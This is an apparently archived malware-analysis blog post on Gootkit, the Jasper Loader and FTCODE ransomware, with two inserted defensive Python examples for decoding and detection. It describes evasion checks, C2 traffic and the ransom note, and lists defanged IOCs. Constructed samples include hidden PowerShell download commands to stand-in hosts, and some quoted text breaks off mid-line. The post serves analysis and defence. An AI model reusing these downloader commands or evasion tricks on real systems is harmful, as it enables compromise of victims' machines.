Nicht so goot - breaking down gootkit and jasper (+ ftcode)

By f0wL · Published: 2019-10-02 · Archived: 2026-04-05 23:42:42 UTC
Wed 02 October 2019 in Banking-Malware
Source: https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html

Pun intended. Gootkit is one of the most widespread banking malware families at the moment and I deemed it a good opportunity to deobfuscate a bit of scrambled code.

A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws, as owning malware binaries/sources might be illegal depending on where you live.

Gootkit Stage 3 Sample available @ Hybrid Analysis --> 3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37

With the obfuscated JavaScript and VB Script samples I thought it would be a good idea to build a simple Python script to clean up the mess Jasper Loader left us. If I come across a newer version I'll update the script; other than that, forks and PRs are always welcome as well.

The VB script used as the first stage isn't really that sophisticated. Basically it consists of 2947 lines, each holding one ASCII character represented as an integer with 302 added to it. Each value is converted back to a char and appended to the string fjuu, which gets executed via WScript once the decoding is complete. The dumped command is once again a long PowerShell command with a base64 segment.

This PS snippet will download and display the weird online pet store order confirmation and the second stage of the Jasper Loader (an obfuscated JavaScript file). The JS stage includes a few unused variables, entangled functions and scrambled strings. These strings are then concatenated into one big string in an array, which in turn is used in two replacement functions and then gets split.
The last step is a loop which calls the geejc function and selects every second character from the array to form the final PowerShell payload. The PS command contains a base64 encoded string, which I decoded as a separate step in the script. Pretty easy so far...

Probably the easiest way to identify a Jasper Loader is by looking at the characteristic conditional at the top of the decoded base64 segment. First it checks the localization of the UI for systems from China, Romania, Russia, Ukraine or Belarus and exits if this condition is true. Jasper will also quit if the WMI Computer_Model query returns a string related to a VM guest system, for anti-analysis and sandbox evasion purposes.

A Setup Information (.inf) file dropped by the PE payload. Looks like we've got some anti-analysis tricks with this binary as well... either way IDA Free does not really like it and complains about being unable to fetch the imports 🤔 Scrambled Import Address Table anyone? We'll take a closer peek later.

Another version of the Gootkit/Jasper combo surfaced on September 26th when they swapped out the 3rd stage payload with FTCODE. Contrary to the belief of some researchers, this PowerShell based ransomware is not new and was first spotted in 2013 by Sophos analysts as described in this article. The link to the Any.Run analysis of the malicious Word document can be found here.

The malicious macro in the Word document will download and execute the FTCODE PowerShell ransomware right away.

`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $atwsxvg = [string][System.Text.Encoding`

Maybe a reference to the developer/group behind this attack?
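As an added example (this is not the author's deobfuscation script, which is not reproduced on the page), the following Python undoes the two decoding steps described above on a constructed sample: the integer-per-line VB stage with 302 added to each character, and the base64 segment of the resulting PowerShell command (decoded as UTF-16LE when it is an -EncodedCommand payload, as UTF-8 otherwise). It then tests the decoded script for the Jasper-style locale and VM check. The embedded PowerShell, the `fjuu` wrapper statements and the regexes for the check are assumptions about how that conditional is written, since the post only describes it in prose.

```python
"""Added example, not the author's script: undo the Jasper Loader decoding
steps described in the post on a constructed sample, then test the result
for the loader's characteristic locale / virtual-machine check."""
import base64
import re

VB_OFFSET = 302  # the VB stage stores ord(char) + 302, one integer per line

# --- constructed sample (assumption: mimics the shape the post describes) ---
INNER_PS = (
    "$c = (Get-UICulture).Name.Substring(0,2)\n"
    "if (@('zh','ro','ru','uk','be') -contains $c) { exit }\n"
    "$m = (Get-WmiObject Win32_ComputerSystem).Model\n"
    "if ($m -match 'Virtual|VMware|VirtualBox') { exit }\n"
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.js')\n"
)
# -EncodedCommand payloads are base64 over UTF-16LE
PS_COMMAND = "powershell -nop -w hidden -enc " + base64.b64encode(
    INNER_PS.encode("utf-16-le")).decode("ascii")
# VB stage: a few ordinary statements around the 'ord(char) + 302' lines
VB_STAGE = "Dim fjuu\n" + "\n".join(
    str(ord(ch) + VB_OFFSET) for ch in PS_COMMAND
) + "\nSet sh = CreateObject(\"WScript.Shell\")\nsh.Run fjuu\n"

INT_LINE = re.compile(r"^\s*(\d+)\s*$")


def decode_vb_stage(vb_text, offset=VB_OFFSET):
    """Rebuild the string the VB stage assembles: every line that is just an
    integer is one character shifted by `offset`; other statements are ignored."""
    out = []
    for line in vb_text.splitlines():
        m = INT_LINE.match(line)
        if m:
            out.append(chr(int(m.group(1)) - offset))
    return "".join(out)


B64_SEGMENT = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def decode_ps_base64(ps_command):
    """Decode the base64 segment of a PowerShell one-liner. -EncodedCommand
    payloads are UTF-16LE (every second byte is NUL for ASCII text); samples
    that wrap plain text in FromBase64String() decode as UTF-8."""
    m = B64_SEGMENT.search(ps_command)
    if not m:
        raise ValueError("no base64 segment found")
    raw = base64.b64decode(m.group(0))
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


UI_CULTURE = re.compile(r"(?i)UICulture|CurrentUICulture|Get-Culture")
BLOCKED_LANGS = ("zh", "ro", "ru", "uk", "be")  # CN, RO, RU, UA, BY language tags
WMI_MODEL = re.compile(r"(?i)Win32_ComputerSystem[\s\S]{0,200}?\bModel\b")


def jasper_indicators(script):
    """Heuristic for the two kill conditions the post describes. The exact
    spelling of the real check is not on the page; these patterns are assumptions."""
    locale_check = bool(UI_CULTURE.search(script)) and all(
        re.search(rf"(?i)\b{tag}\b", script) for tag in BLOCKED_LANGS)
    vm_check = bool(WMI_MODEL.search(script))
    return {"locale_check": locale_check, "vm_check": vm_check,
            "likely_jasper": locale_check and vm_check}


def unpack(vb_text):
    """Full chain: VB stage -> PowerShell command -> decoded script -> indicators."""
    ps_command = decode_vb_stage(vb_text)
    script = decode_ps_base64(ps_command)
    return {"ps_command": ps_command, "script": script,
            "indicators": jasper_indicators(script)}


if __name__ == "__main__":
    result = unpack(VB_STAGE)
    print(result["script"])
    print(result["indicators"])
```

The UTF-16LE test is deliberately loose (more than a quarter of the odd bytes are NUL) so that a payload with a few non-ASCII characters still takes the right branch; a wrong guess shows up immediately as a script full of NULs or mojibake, which is the cue to flip the encoding by hand.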
We won't know for sure, but the string "BXCODE hack your system" is present in all recent occurrences of FTCODE.

Ladies and gentlemen, this is the part of the code that gave today's ransomware its name. It will append the extension .FTCODE to every encrypted file and drop an HTML ransom note in the respective directories. Again, this PS script also features the "kill switch"/evasion technique found in Jasper.

Communication with the C&C server is accomplished via System.Net.WebClient and POST requests to the hardcoded address. In this case the victim ID (a UUID) and the generated encryption key are transmitted (in plain text, so a packet capture would get you the key and therefore your data back without paying the cyber-criminals :D ).

Looks like FTCODE actually has a killswitch: if a file called w00log03.tmp is present in %PUBLIC%\OracleKit, the ransomware will create a new file called good_day.log and exit.

Another run-of-the-mill behaviour of ransomware these days is to disable the recovery mode and delete the system backups and shadow copies. So nothing really new here either...

FTCODE will encrypt all files with the following extensions:

"*.sql","*.mp4","*.7z","*.rar","*.m4a","*.wma","*.avi","*.wmv","*.csv","*.d3dbsp","*.zip","*.sie","*

The ransom note, dropped as an HTML file with the filename READ_ME_NOW.htm:

> # All your files was encrypted!
> Your personal ID: **$whyjfdxez**
> Your personal KEY: $gdejthseee
> 1. Download Tor browser - https://www.torproject.org/download/
> 2. Install Tor browser
> 3. Open Tor Browser
> 4. Open link in TOR browser: **http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.o**
> **5. Follow the instructions on this page**
> ## ***** Warning*****
> Do not rename files
> Do not try to back your data using third-party software, it may cause permanent data loss(If you d
> As evidence, we can for free back one file
> Decoders of other users is not suitable to back your files - encryption key is created on your com

Twitter user treetone alerted possible victims not to pay the ransom since he did not receive a decryptor after paying the ransom for a client. Obviously there are different reports about the steps after paying the ransom, as shown below. As reported by BleepingComputer forum user Hidemik, paying the ransom will redirect the victim to a page with the instructions to run the following PowerShell script (I removed the Base64 encoded RSA key):

IOCs

Gootkit (SHA256)
- 3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37

Malicious .docm (SHA256)
- bf1fae0bca74eb3e788985734c750e33949e24f44f4c6e76c615aa70a80ea175

Related Files (SHA256)
- 93aef539b491ecd4f3e3bfad2b226e8026d3335e457f5d8ba903e1d76686633e --> feat-chewy-shipping-confirmation
- 3721af6150db2082e6f8342c450070b835a46311c2fade9e1cd5598727d7db4f --> index.js
- e6c58e32c151f2e9e44cd8bc98cdf12373a7f8fc40262e1c4402f2eb6d191d1e --> invoice_confirmation_53467823886

URLs
- hxxp://getpdfreader.13stripesbrewery[.]com/pdf.php?MTo7Njc2NDk3
- hxxp://rejoiner[.]com/resources/wp-content/uploads/2017/04/feat-chewy-shipping-confirmation.jpg
- hxxp://ont.carolinabeercompany[.]com/bolp.cab
- hxxp://wws.tkgventures[.]com/ (Source Port: 49207/ 50769, 194.76.224[.]108:80)
- hxxp://z2g3mtkwotm4[.]top/ (Source Port: 52742/ 52745, 35.187.36[.]248:80)
- hxxps://adp.reevesandcompany[.]com/rbody320 (176.10.125[.]87:443)
- hxxp://picturecrafting[.]site (208.91.197.91)
- hxxp://ogy5mtkwotm4[.]top
- hxxp://mjvjmtkwotm4[.]top
- hxxp://otnhmtkwotm4[.]top
- hxxp://zgzimtkwotm4[.]top
- hxxp://cofee.theshotboard[.]net/?need=uuid&vid=dc1:loadjs&
- hxxp://aweb.theshotboard[.]info/?page=xing&vid=dc1:load
- hxxp://aweb.theshotboard[.]info/ver=926.3&guid=VICTIM-ID+PASSWD
- hxxp://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd[.]onion/?guid=VICTIM-ID
- hxxp://home.tith[.]in/seven.sat
- hxxp://connect.simplebutmatters[.]com (185.158.248[.]151)
- hxxp://home.isdes[.]com (31.214.157[.]3)
- hxxp://home.southerntransitions[.]net (31.214.157[.]3)
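As an added example (not code from the write-up), here is a small triage routine that turns the FTCODE behaviour described above and the beacon URLs from the IOC list into detection logic. It scores constructed Sysmon-style events (field names follow Sysmon's EventID 1/11/22: `Image`, `CommandLine`, `TargetFilename`, `QueryName`; the events themselves are made up) for the READ_ME_NOW.htm note, the .FTCODE extension, the %PUBLIC%\OracleKit kill-switch files and DNS lookups of the theshotboard hosts, and it parses the `ver=...&guid=VICTIM-ID+PASSWD` beacon shape. Reading `+` as the separator between victim ID and password is an assumption taken from the IOC placeholders.

```python
"""Added example, not from the post: triage constructed Sysmon-style events
for the FTCODE artifacts the write-up names, and parse the beacon URL shape
shown in its IOC list."""
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

RANSOM_NOTE = "read_me_now.htm"
ENCRYPTED_EXT = ".ftcode"
KILLSWITCH_DIR = re.compile(r"\\public\\oraclekit\\", re.I)  # %PUBLIC%\OracleKit
KILLSWITCH_FILES = {"w00log03.tmp": "killswitch_armed", "good_day.log": "killswitch_hit"}
# hosts from the post's IOC list, undefanged for matching
BEACON_HOSTS = {"aweb.theshotboard.info", "cofee.theshotboard.net"}
DOWNLOADER = re.compile(r"(?i)Net\.WebClient|FromBase64String")

# constructed events, one JSON object per line
SAMPLE_EVENTS = [json.loads(line) for line in r"""
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""}
{"EventID": 22, "Computer": "WS01", "QueryName": "aweb.theshotboard.info"}
{"EventID": 11, "Computer": "WS01", "TargetFilename": "C:\\Users\\bob\\Documents\\report.docx.FTCODE"}
{"EventID": 11, "Computer": "WS01", "TargetFilename": "C:\\Users\\bob\\Documents\\budget.xlsx.FTCODE"}
{"EventID": 11, "Computer": "WS01", "TargetFilename": "C:\\Users\\bob\\Documents\\READ_ME_NOW.htm"}
{"EventID": 11, "Computer": "WS02", "TargetFilename": "C:\\Users\\Public\\OracleKit\\w00log03.tmp"}
{"EventID": 11, "Computer": "WS02", "TargetFilename": "C:\\Users\\Public\\OracleKit\\good_day.log"}
{"EventID": 11, "Computer": "WS03", "TargetFilename": "C:\\Users\\alice\\Desktop\\notes.txt"}
""".strip().splitlines()]


def classify_event(ev):
    """Map one event to an FTCODE indicator name, or None if nothing matches."""
    eid = ev.get("EventID")
    if eid == 11:  # Sysmon FileCreate
        path = ev.get("TargetFilename", "")
        name = path.rsplit("\\", 1)[-1].lower()
        if name == RANSOM_NOTE:
            return "ransom_note"
        if name.endswith(ENCRYPTED_EXT):
            return "encrypted_file"
        if name in KILLSWITCH_FILES and KILLSWITCH_DIR.search(path):
            return KILLSWITCH_FILES[name]
    elif eid == 1:  # Sysmon ProcessCreate
        if "powershell" in ev.get("Image", "").lower() and DOWNLOADER.search(ev.get("CommandLine", "")):
            return "powershell_downloader"
    elif eid == 22:  # Sysmon DNS query
        if ev.get("QueryName", "").lower() in BEACON_HOSTS:
            return "beacon_dns"
    return None


def triage(events):
    """Count indicators per host and derive one verdict per host."""
    per_host = defaultdict(lambda: defaultdict(int))
    for ev in events:
        tag = classify_event(ev)
        if tag:
            per_host[ev.get("Computer", "?")][tag] += 1
    verdicts = {}
    for host, tags in per_host.items():
        if tags.get("ransom_note", 0) or tags.get("encrypted_file", 0) >= 3:
            verdicts[host] = "encryption_in_progress"
        elif tags.get("killswitch_hit", 0):
            verdicts[host] = "ran_but_killswitch_hit"  # good_day.log: FTCODE ran and bailed out
        elif tags.get("beacon_dns", 0) or tags.get("powershell_downloader", 0):
            verdicts[host] = "stage_suspected"
        else:
            verdicts[host] = "killswitch_present_only"
    return verdicts, {h: dict(t) for h, t in per_host.items()}


def parse_beacon(url):
    """Split the beacon URL from the IOC list into its fields. The IOC entry reads
    .../ver=926.3&guid=VICTIM-ID+PASSWD (no '?'), so the query is taken from the
    path when the query part is empty; '+' as the id/password separator is an
    assumption from those placeholders, not something the post states."""
    parts = urlsplit(url)
    query = parts.query or parts.path.lstrip("/")
    fields = dict(kv.split("=", 1) for kv in query.split("&") if "=" in kv)
    victim, _, passwd = fields.get("guid", "").partition("+")
    return {"host": parts.hostname, "ver": fields.get("ver"),
            "victim_id": victim, "passwd": passwd}


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
    print(parse_beacon("http://aweb.theshotboard.info/ver=926.3&guid=VICTIM-ID+PASSWD"))
```

The kill-switch handling is split into two tags on purpose: w00log03.tmp alone only means the file is present (whether placed deliberately as a vaccine or left behind), while good_day.log means the ransomware actually executed on that host and exited, which is worth an investigation of how it got there even though nothing was encrypted.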